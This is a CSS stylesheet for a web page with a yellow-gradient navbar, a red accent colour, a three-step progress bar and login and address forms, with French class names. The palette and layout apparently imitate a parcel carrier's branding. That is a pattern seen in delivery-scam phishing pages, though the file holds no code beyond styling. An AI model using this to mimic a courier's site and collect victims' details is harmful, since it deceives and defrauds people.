:root {
	--fa-font-solid: normal 900 1em/1 "Font Awesome 6 Solid";
	--fa-font-regular: normal 400 1em/1 "Font Awesome 6 Regular";
	--fa-font-light: normal 300 1em/1 "Font Awesome 6 Light";
	--fa-font-thin: normal 100 1em/1 "Font Awesome 6 Thin";
	--fa-font-duotone: normal 900 1em/1 "Font Awesome 6 Duotone";
	--fa-font-sharp-solid: normal 900 1em/1 "Font Awesome 6 Sharp";
	--fa-font-brands: normal 400 1em/1 "Font Awesome 6 Brands";
}

:root {
	--bs-blue: #0d6efd;
	--bs-indigo: #6610f2;
	--bs-purple: #6f42c1;
	--bs-pink: #d63384;
	--bs-red: #dc3545;
	--bs-orange: #fd7e14;
	--bs-yellow: #ffc107;
	--bs-green: #198754;
	--bs-teal: #20c997;
	--bs-cyan: #0dcaf0;
	--bs-white: #fff;
	--bs-gray: #6c757d;
	--bs-gray-dark: #343a40;
	--bs-primary: #0d6efd;
	--bs-secondary: #6c757d;
	--bs-success: #198754;
	--bs-info: #0dcaf0;
	--bs-warning: #ffc107;
	--bs-danger: #dc3545;
	--bs-light: #f8f9fa;
	--bs-dark: #212529;
	--bs-font-sans-serif: c-ui, -apple-c, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
	--bs-font-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
	--bs-gradient: linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));
}

*,
::after,
::before {
	box-sizing: border-box;
}

@media (prefers-reduced-motion:no-preference) {
	:root {
		scroll-behavior: smooth;
	}
}

body {
	margin: 0;
	font-family: var(--bs-font-sans-serif);
	font-size: 1rem;
	font-weight: 400;
	line-height: 1.5;
	color: #212529;
	background-color: #fff;
	-webkit-text-size-adjust: 100%;
	-webkit-tap-highlight-color: transparent;
}

hr {
	margin: 1rem 0;
	color: inherit;
	background-color: currentColor;
	border: 0;
	opacity: .25;
}

hr:not([size]) {
	height: 1px;
}

h5 {
	margin-top: 0;
	margin-bottom: .5rem;
	font-weight: 500;
	line-height: 1.2;
}

h5 {
	font-size: 1.25rem;
}

p {
	margin-top: 0;
	margin-bottom: 1rem;
}

ul {
	padding-left: 2rem;
}

ul {
	margin-top: 0;
	margin-bottom: 1rem;
}

b {
	font-weight: bolder;
}

img {
	vertical-align: middle;
}

label {
	display: inline-block;
}

button {
	border-radius: 0;
}

button:focus:not(:focus-visible) {
	outline: 0;
}

button,
input {
	margin: 0;
	font-family: inherit;
	font-size: inherit;
	line-height: inherit;
}

button {
	text-transform: none;
}

button {
	-webkit-appearance: button;
}

button:not(:disabled) {
	cursor: pointer;
}

.container,
.container-fluid {
	width: 100%;
	padding-right: var(--bs-gutter-x, .75rem);
	padding-left: var(--bs-gutter-x, .75rem);
	margin-right: auto;
	margin-left: auto;
}

@media (min-width:576px) {
	.container {
		max-width: 540px;
	}
}

@media (min-width:768px) {
	.container {
		max-width: 720px;
	}
}

@media (min-width:992px) {
	.container {
		max-width: 960px;
	}
}

@media (min-width:1200px) {
	.container {
		max-width: 1140px;
	}
}

@media (min-width:1400px) {
	.container {
		max-width: 1320px;
	}
}

.row {
	--bs-gutter-x: 1.5rem;
	--bs-gutter-y: 0;
	display: flex;
	flex-wrap: wrap;
	margin-top: calc(var(--bs-gutter-y) * -1);
	margin-right: calc(var(--bs-gutter-x)/ -2);
	margin-left: calc(var(--bs-gutter-x)/ -2);
}

.row>* {
	flex-shrink: 0;
	width: 100%;
	max-width: 100%;
	padding-right: calc(var(--bs-gutter-x)/ 2);
	padding-left: calc(var(--bs-gutter-x)/ 2);
	margin-top: var(--bs-gutter-y);
}

.gx-4 {
	--bs-gutter-x: 1.5rem;
}

@media (min-width:992px) {
	.col-lg-4 {
		flex: 0 0 auto;
		width: 33.3333333333%;
	}

	.col-lg-8 {
		flex: 0 0 auto;
		width: 66.6666666667%;
	}

	.col-lg-9 {
		flex: 0 0 auto;
		width: 75%;
	}
}

.form-control {
	display: block;
	width: 100%;
	padding: .375rem .75rem;
	font-size: 1rem;
	font-weight: 400;
	line-height: 1.5;
	color: #212529;
	background-color: #fff;
	background-clip: padding-box;
	border: 1px solid #ced4da;
	-webkit-appearance: none;
	-moz-appearance: none;
	appearance: none;
	border-radius: .25rem;
	transition: border-color .15s ease-in-out, box-shadow .15s ease-in-out;
}

@media (prefers-reduced-motion:reduce) {
	.form-control {
		transition: none;
	}
}

.form-control:focus {
	color: #212529;
	background-color: #fff;
	border-color: #86b7fe;
	outline: 0;
	box-shadow: 0 0 0 .25rem rgba(13, 110, 253, .25);
}

.form-control::placeholder {
	color: #6c757d;
	opacity: 1;
}

.form-control:disabled {
	background-color: #e9ecef;
	opacity: 1;
}

.btn {
	display: inline-block;
	font-weight: 400;
	line-height: 1.5;
	color: #212529;
	text-align: center;
	text-decoration: none;
	vertical-align: middle;
	cursor: pointer;
	-webkit-user-select: none;
	-moz-user-select: none;
	user-select: none;
	background-color: transparent;
	border: 1px solid transparent;
	padding: .375rem .75rem;
	font-size: 1rem;
	border-radius: .25rem;
	transition: color .15s ease-in-out, background-color .15s ease-in-out, border-color .15s ease-in-out, box-shadow .15s ease-in-out;
}

@media (prefers-reduced-motion:reduce) {
	.btn {
		transition: none;
	}
}

.btn:hover {
	color: #212529;
}

.btn:focus {
	outline: 0;
	box-shadow: 0 0 0 .25rem rgba(13, 110, 253, .25);
}

.btn:disabled {
	pointer-events: none;
	opacity: .65;
}

.navbar {
	position: relative;
	display: flex;
	flex-wrap: wrap;
	align-items: center;
	justify-content: space-between;
	padding-top: .5rem;
	padding-bottom: .5rem;
}

.navbar>.container-fluid {
	display: flex;
	flex-wrap: inherit;
	align-items: center;
	justify-content: space-between;
}

.mt-3 {
	margin-top: 1rem !important;
}

.mt-4 {
	margin-top: 1.5rem !important;
}

.me-2 {
	margin-right: .5rem !important;
}

.ms-1 {
	margin-left: .25rem !important;
}

.text-center {
	text-align: center !important;
}

body {
	margin: 0;
	padding: 0;
}

.navbar {
	background: linear-gradient(to right, #FFCC00, #FFCC00, #FFEFB1);
	width: 100%;
	padding: 20px 30px;
}

@media (max-width: 767px) {
	.navbar {
		padding: 0 0 0 10px;
	}
}

.navbar .topping {
	display: flex;
	width: 100%;
	justify-content: space-between;
	align-items: center;
}

.navbar .topping img {
	width: 200px;
}

@media (max-width: 767px) {
	.navbar .topping img {
		width: 130px;
	}
}

.navbar .topping ul {
	list-style: none;
	display: flex;
	margin-bottom: 0;
}

@media (max-width: 767px) {
	.navbar .topping ul.web {
		display: none;
	}
}

.navbar .topping ul li {
	font-size: 14px;
	margin-left: 30px;
	cursor: pointer;
	transition: 0.3s;
}

.navbar .topping ul li:hover {
	color: red;
}

@media (max-width: 840px) {
	.navbar .topping ul li {
		margin-left: 15px;
	}
}

.navbar .topping ul.respo {
	display: none;
}

@media (max-width: 767px) {
	.navbar .topping ul.respo {
		display: flex;
	}

	.navbar .topping ul.respo li i {
		font-size: 40px;
		color: #D40511;
	}
}

.navbar .bottomin {
	margin-top: 40px;
	display: flex;
	justify-content: space-between;
	align-items: center;
	width: 100%;
}

@media (max-width: 767px) {
	.navbar .bottomin {
		display: none;
	}
}

.navbar .bottomin ul {
	list-style: none;
	display: flex;
	flex-wrap: wrap;
	margin-bottom: 0;
	padding-left: 0;
}

.navbar .bottomin ul li {
	font-size: 14px;
	font-weight: 700;
	margin-right: 30px;
	cursor: pointer;
	transition: 0.3s;
}

.navbar .bottomin ul li:hover {
	color: red;
}

.navbar .bottomin p {
	font-size: 14px;
	font-weight: 700;
	margin-bottom: 0;
}

.navbar .bottomin p:hover {
	color: red;
}

.navbar .bottomin p i {
	font-size: 20px;
}

.home {
	background: url("titiza.png") no-repeat center center;
	background-size: cover;
	width: 100%;
	height: 420px;
	position: relative;
}

.home .otside {
	position: absolute;
	left: 0;
	right: 0;
	top: 0;
	bottom: 0;
	width: 100%;
	height: 100%;
	background: rgba(0, 0, 0, 0.4);
}

.home .otside .lettre {
	background: #fcfcfc;
	box-shadow: 0 0 5px 2px rgba(0, 0, 0, 0.1);
	margin: 0 auto;
	width: 750px;
	padding: 40px 20px;
	border-radius: 5px;
	margin-bottom: 0;
}

@media (max-width: 991px) {
	.home .otside .lettre {
		width: 700px;
	}
}

@media (max-width: 767px) {
	.home .otside .lettre {
		width: 100%;
	}
}

.home .otside .lettre .titre {
	display: flex;
	align-items: center;
	margin-bottom: 0;
}

.home .otside .lettre .titre img {
	width: 70px;
	height: 70px;
	filter: invert(27%) sepia(0%) saturate(0%) hue-rotate(346deg) brightness(0%) contrast(0%);
}

@media (max-width: 767px) {
	.home .otside .lettre .titre img {
		height: 40px;
		width: 40px;
	}
}

@media (max-width: 767px) {
	.home .otside .lettre .titre img {
		height: 25px;
		width: 25px;
	}
}

.home .otside .lettre .steps {
	width: 100%;
	display: flex;
	justify-content: space-between;
}

.home .otside .lettre .steps span {
	width: 32.5%;
	background: #d40511;
	height: 10px;
}

.home .otside .lettre .steps span.green {
	background: green;
}

.sous {
	background: #F2F2F2;
	padding: 40px 30px;
}

@media (max-width: 767px) {
	.sous {
		padding: 40px 10px;
	}
}

.sous ul {
	list-style: none;
	display: flex;
	padding-left: 0;
	flex-wrap: wrap;
	margin-top: 10px;
	margin-bottom: 30px;
}

.sous ul li {
	padding-right: 20px;
	padding-top: 10px;
	font-size: 14px;
	color: #666;
	transition: 0.3s;
}

.sous ul li:hover {
	color: #D40511;
}

.sous .ss {
	font-size: 15px;
	margin-top: 20px;
	color: #666;
}

.info .otside .login {
	width: 850px;
	background: none;
	padding: 0;
	box-shadow: none;
}

@media (max-width: 991px) {
	.info .otside .login {
		width: 750px;
	}
}

@media (max-width: 840px) {
	.info .otside .login {
		width: 650px;
	}
}

@media (max-width: 767px) {
	.info .otside .login {
		width: 100%;
	}
}

.info .otside .login .dell {
	background: white;
	padding: 40px;
	box-shadow: 0 0 5px 2px rgba(0, 0, 0, 0.1);
	border-radius: 5px;
}

@media (max-width: 991px) {
	.info .otside .login .genius {
		order: 2;
	}
}

.info .otside .login .gauche {
	background: white;
	padding: 30px;
	margin-top: 20px;
	box-shadow: 0 0 5px 2px rgba(0, 0, 0, 0.1);
	border-radius: 5px;
}

@media (max-width: 450px) {
	.info .otside .login .gauche {
		padding: 20px;
	}
}

.info .otside .login .gauche label {
	font-size: 14px;
	font-weight: 700;
	margin-bottom: 4px;
}

.info .otside .login .gauche label span {
	color: red;
}

.info .otside .login .gauche input {
	border-radius: 1px;
}

.info .otside .login .gauche input:focus {
	box-shadow: none;
	border: 1px solid black;
}

.info .otside .login .gauche .calisy {
	width: 100%;
	display: flex;
	justify-content: space-between;
}

@media (max-width: 567px) {
	.info .otside .login .gauche .calisy {
		display: block;
	}
}

.info .otside .login .gauche .calisy .ville {
	width: 60%;
}

@media (max-width: 567px) {
	.info .otside .login .gauche .calisy .ville {
		width: 100%;
	}
}

.info .otside .login .gauche .calisy .astra {
	width: 35%;
}

@media (max-width: 567px) {
	.info .otside .login .gauche .calisy .astra {
		width: 100%;
	}
}

.info .otside .login .gauche .botona {
	margin-top: 40px;
	text-align: right;
}

.info .otside .login .gauche .botona .btn {
	margin-top: 20px;
	color: red;
	background: #D40511;
	color: white;
	padding: 6px 25px;
	font-weight: 600;
	transition: 0.3s;
}

.info .otside .login .gauche .botona .btn:hover {
	background: red;
}

@media (max-width: 567px) {
	.info .otside .login .gauche .botona .btn {
		width: 100%;
	}
}

@media (max-width: 991px) {
	.info .otside .login .power {
		order: 1;
	}
}

.info .otside .login .droit {
	background: white;
	padding: 20px;
	margin-top: 20px;
	box-shadow: 0 0 5px 2px rgba(0, 0, 0, 0.1);
	border-radius: 5px;
}

.info .otside .login .droit .offre .status p {
	font-size: 13px;
}

.info .otside .login .droit .important h5 {
	color: red;
	font-size: 17px;
	font-weight: 700;
}

.info .otside .login .droit .important p {
	font-size: 13px;
	color: rgba(0, 0, 0, 0.7);
}

.boso {
	margin-top: 600px;
}

@media (max-width: 991px) {
	.boso {
		margin-top: 900px;
	}
}

@media (max-width: 567px) {
	.boso {
		margin-top: 1000px;
	}
}

@media (max-width: 450px) {
	.boso {
		margin-top: 1150px;
	}
}

[class*=" bi-"]::before {
	display: inline-block;
	font-family: bootstrap-icons !important;
	font-style: normal;
	font-weight: normal !important;
	font-variant: normal;
	text-transform: none;
	line-height: 1;
	vertical-align: text-bottom;
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.bi-chevron-down::before {
	content: "\f282";
}

.bi-exclamation-circle::before {
	content: "\f313";
}

.bi-globe::before {
	content: "\f3ce";
}

.bi-list::before {
	content: "\f456";
}

.bi-person-fill::before {
	content: "\f4b3";
}

.bi-search::before {
	content: "\f502";
}

@font-face {
	font-family: "bootstrap-icons";
	src: url("https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/fonts/bootstrap-icons.woff?4601c71fb26c9277391ec80789bfde9c") format("woff"), url("https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/fonts/bootstrap-icons.woff2?4601c71fb26c9277391ec80789bfde9c") format("woff2");
}